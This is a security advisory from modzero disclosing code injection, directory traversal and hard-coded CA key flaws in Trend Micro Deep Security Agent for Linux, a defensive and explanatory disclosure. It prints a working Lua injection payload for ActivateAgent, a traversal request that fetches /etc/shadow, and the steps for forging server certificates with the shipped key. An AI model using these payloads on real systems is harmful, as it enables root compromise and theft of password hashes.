[MZ-21-02] Trend Micro Deep Security Agent for Linux

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253

------------------------------------------------------------------v1-
modzero Security Advisory [MZ-21-02]:
Critical Vulnerabilities in Trend Micro Deep Security Agent for Linux
---------------------------------------------------------------------

---------------------------------------------------------------------
1. Timeline
---------------------------------------------------------------------

* 2021-09-07: Initial contact, PGP key exchange, Advisory (draft)
              along with fully working exploits written in Python
              submitted.
* 2021-09-08: Received a (probably automated) plaintext reply full-
              quoting the previously PGP-encrypted initial email.
* 2021-09-15: Asked for status update and the usage of PGP.
* 2021-09-18: Received confirmation for the observed behavior.
* 2021-09-22: Trend Micro shared a status update: They are working on
              a fix, ETA is end of October 2021.
* 2021-09-23: Asked for a CVE number.
* 2021-09-27: Received confirmation that vulnerabilities are valid.
              Assignment of CVE would depend on fix to be released.
* 2021-10-12: Received a test build, that supposedly fixes code
              injection and directory traversal issues.
* 2022-01-12: Assignment of CVE numbers: CVE-2022-23119,
              CVE-2022-23120
* 2022-01-19: Public release

---------------------------------------------------------------------
2. Summary
---------------------------------------------------------------------

Vendor: Trend Micro
Homepage: https://www.trendmicro.com

Products known to be affected:

- Deep Security Agent 20.0.0-2740 for Ubuntu
- Deep Security Agent 20.0.0-2921 for Ubuntu

The Trend Micro Deep Security Agent is an agent software for different
operating  systems, that  connects with a server  software to  perform
tasks related to virus protection.

The Trend Micro Deep Security software suite consists of server and a
client (agent) component. After an initial configuration (activation),
the clients are managed by the server.

Once installed as instructed by the vendor, the Trend  Micro Deep
Security  agent is  running as  root user. A  compromise of the agent
results in high privileges on the system.

If left   unconfigured,  a  machine with  the  Deep  Security   agent
installed is vulnerable to a privilege escalation attack, that allows
a local attacker to run arbitrary code as root. This is due to a code
injection vulnerability in the `ActivateAgent` command, which is sent
by the server.

An addition directory  traversal vulnerability in the `GetCopiedFile`
command allows a remote attacker to read arbitrary files from the
filesystem.

The  Trend Micro  Deep  Security  agent  software  is  shipped   with
hardcoded credentials such as private key material.

---------------------------------------------------------------------
3. Details
---------------------------------------------------------------------

* 3.1. Local Privilege Escalation

The Trend Micro  Deep Security  Agent does  not perform  proper input
sanitization,  which allows a local  unprivileged  attacker to inject
and run code as `root` user.

The `ActivateAgent`  remote procedure call can  be used to inject lua
code as can be seen in the disassembly:

---- listing 1 ----
local Activate = function(self)
  self.connectionHandler.dom:SetNil(self.activationLogSetting)
  self.connectionHandler.dom:SetNil(self.activationCodeSetting)
  cb:Invoke(CALLBACKS.PreThreadCreate, self)
  if not self.activationThread then
    local codeToRun = self.codeToRunFmt:format(dsa.DomString(self.connectionHandler.dom:Get("uuid")), self.url, self.activationLogSetting, self.activationCodeSetting)
    dsa.LogTrace(_NAME, "Starting thread to execute: %s", codeToRun)
    self.activationThread = Thread(codeToRun, "ActivateThread", self.connectionHandler.dom)
  end
---- /listing 1 ----

The  variable `self.url`  is  an  attacker controlled  input (via the
`host` HTTP-GET parameter), thus `codeToRun` is attacker controlled.
In line 8 of listing 2 that code is executed.
An  example  request  sent  with the  `sendCommand` utility, that  is
shipped with the agent software looks like this:

---- listing 2 ----
./sendCommand --get 'ActivateAgent' 'host=","","");print("PoC");aia=Activate("http'
---- /listing 2 ----

In the log file, the debug message from line 7 is visible:

---- listing 3 ----
2021-08-26 07:30:48.518144 [-0800]: [dsa.Command.ActivateAgent/5] | Starting thread to execute: local Activate = require "dsa.Activate"; local aia = Activate(nil, "https://","","");print("PoC");aia=Activate("http:4120/", "dsa.Activate.logData", "dsa.Activate.statusCode"); aia:main(); | dsa/Command/ActivateAgent.lua:34:(null) | 792:7FB6077FF640:ConnectionHandlerPool_0004
---- /listing 3 ----

The `print("PoC")` command has been successfully injected into
`codeToRun`, which is then run, as can be seen in the next line
from the log file:

---- listing 4 ----
2021-08-26 07:30:48.598320 [-0800]: [Message/3] | PoC | [string "dsa"]:1:(null) | 792:7FB606CFF640:ActivateThread
---- /listing 4 ----

A more sophisticated PoC that runs the shell code `whoami > /poc` is
provided in the 'Exploits' section.

* 3.2. Arbitrary File Read / Directory Traversal

The Trend Micro  Deep Security  Agent does  not perform  proper input
validation and concatenates  attacker controlled  input to a filepath
as shown in the lua disassembly:

---- listing 5 ----
 if dsa.OS == "Linux" then
    if connectionHandler.dom:Get("dsa.mode.vmsafeGuest") then
      fname = plpath.join(workDir, "CopyFiles/copied/" .. queryArgs.taskname .. "/" .. queryArgs.fileid)
    else
      fname = plpath.join(workDir, "guests/0000-0000-0000/CopyFiles/copied/" .. queryArgs.taskname .. "/" .. queryArgs.fileid)
    end
  else
    fname = plpath.join(workDir, "dsa_core\\CopyFiles\\copied\\" .. queryArgs.taskname .. "\\" .. queryArgs.fileid)
  end
---- /listing 5 ----

Both   `queryArgs.taskname`  and   `queryArgs.fileid`  are   attacker
controlled HTTP GET parameters.

An example request to get the `/etc/shadow` file with password hashes
would look like this:

`GET https://10.0.0.2:4118/GetCopiedFile?taskname=.&fileid=../../../../../../../etc/shadow`

If the agent is  left unconfigured  (has not been  'activated' by the
server component)  or the server has  been compromised,  the agent is
vulnerable to such an attack.

* 3.3. Default CA is shipped with a private key

The Trend  Micro Deep  Security Agent  authenticates  remote  servers
using mutual TLS (mTLS): Both the  server and the agent identify each
other by presenting a certificate.

The agent software ships  with a hardcoded  default X.509 certificate
and a  corresponding  private  key.  Until the  agent is   configured
('activated')  by the server  component this  certificate  is used in
communications with the server. It is stored in the shared object file
/opt/ds_agent/lib/dsa_core.so

The agent software uses a certificate authority (CA) to establish the
server's  identity.  When  the  server  connects to  the  agent,  its
certificate is validated against this CA.

However, the  agent uses its  own certificate  also as a  CA. As this
certificate ships with a private key it is possible for an attcker to
create and sign their own server certificate, imitate a server and to
send commands to the client software.

Thus an attacker can:
  * extract the CA (certificate + private key) from the agent software
  * generate their own certificate + key
  * sign their certificate with the CA taken from the agent software
  * use it for further communication with the agent
  * configure their own certificate in the agent and 'activate' it

---------------------------------------------------------------------
4. Impact
---------------------------------------------------------------------

The identified vulnerabilities in the Trend Micro Deep Security Agent
software result in local privilege escalation and arbitrary remote
file reads.

---------------------------------------------------------------------
5. Prerequisites
---------------------------------------------------------------------

For an attacker  to suceed  with a privilege  escalation  attack, the
agent has to  be left unconfigured  (not  'activated') or  the server
component has to be compromised.  Furthermore local code execution or
the ability to originate HTTP requests  from localhost (e.g. SSRF) is
required.

For an attacker  to succeed  with a directory  traversal  attack, the
agent has to  be left unconfigured  (not  'activated') or  the server
component has to  be compromised.  Furthermore network  access to the
agent software is required.

---------------------------------------------------------------------
6. Exploits
---------------------------------------------------------------------

All PoC exploits, tools  and additional information  are available on
Github: https://github.com/modzero/MZ-21-02-Trendmicro


---------------------------------------------------------------------
7. Fix
---------------------------------------------------------------------

* 2021-10-12: The vendor supplied a test build that supposedly fixes
              the directory traversal and the local privilege
              escalation.

---------------------------------------------------------------------
8. Credits
---------------------------------------------------------------------

  * Fluepke (Carl Fabian Luepke) of modzero


---------------------------------------------------------------------
9. About modzero
---------------------------------------------------------------------

The independent  Swiss-German  company  modzero assists  clients with
security analysis  in the complex  areas of computer  technology. The
focus  lies on  highly  detailed  technical  analysis  of   concepts,
software  and  hardware  components as  well as  the  development  of
individual  solutions.  Colleagues  at  modzero work  exclusively  in
practical, highly  technical computer-security  areas and can draw on
decades of  experience  in various  platforms,  system concepts,  and
designs.

https://www.modzero.com contact@modzero.com

modzero follows coordinated disclosure practices described here:

https://www.modzero.com/static/modzero_Disclosure_Policy.pdf.

This policy  should  have been  sent to  the vendor  along with  this
security advisory.

---------------------------------------------------------------------
10. Disclaimer
---------------------------------------------------------------------

The information  in the advisory  is believed  to be accurate  at the
time of publishing based  on currently available  information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no  warranties  concerning  this  information. Neither  the
author  nor the  publisher  accepts  any liability  for  any  direct,
indirect, or  consequential  loss or  damage  arising from  using, or
reliance on, this information.